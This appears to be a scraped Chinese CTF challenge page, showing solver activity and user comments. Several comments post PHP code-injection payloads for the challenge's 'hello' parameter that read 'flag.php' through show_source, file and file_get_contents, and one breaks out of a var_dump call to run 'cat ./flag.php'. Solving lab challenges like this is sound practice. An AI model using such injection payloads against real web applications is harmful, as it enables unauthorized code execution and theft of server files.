评分(9)
解题动态
peaceminus1 攻破了该题 7小时前
CJ00q 攻破了该题 8小时前
wyswyswys 攻破了该题 10小时前
fxstu 攻破了该题 11小时前
smileblack 攻破了该题 12小时前
GOOFY 攻破了该题 14小时前
shayijlong 攻破了该题 1天前
果冻战士 攻破了该题 1天前
yfm277 攻破了该题 1天前
alwayslookpoomi 攻破了该题 1天前
2278788320 攻破了该题 1天前
swind11 攻破了该题 1天前
GTfree 攻破了该题 1天前
用户1119 攻破了该题 1天前
byx341 攻破了该题 1天前
2023329600155 攻破了该题 2天前
熊熊出没 攻破了该题 2天前
online 攻破了该题 2天前
晴天1 攻破了该题 2天前
评论
l03h11x28 3年前
举报
这题是不是不能做了啊 卧槽 为啥我不显示 坑我两块钱 rnm退钱!!!
118234 3年前
举报
`cat /flag`
luoyao 3年前
举报
?hello=file("flag.php")
luyisie 3年前
举报
file // show_source // highlight_file
wwgy9981 3年前
举报
flag = 'Too Young Too Simple‘
kavin 3年前
举报
明白了原理,用bp搞了一轮,发现hello=show_source('flag.php')可行
kuaiting 3年前
举报
使用?hello=file('flag.php') 或者?hello=show_source('flag.php') 等可以读取源码的函数 或者构造var_dump($a) 闭合
陈江川0118 3年前
举报
简单来说就是利用file函数把flag.php的内容存到一个数组中,然后打印出来数组的内容即可
trackboy 3年前
举报
?hello=file(%22flag.php%22) ?hello=file_get_contents(%27flag.php%27) ?hello=1);show_source(%27flag.php%27);var_dump( ?hello=);echo%20`cat%20./flag.php`;//
lgb236277484 3年前
举报
highlight_file()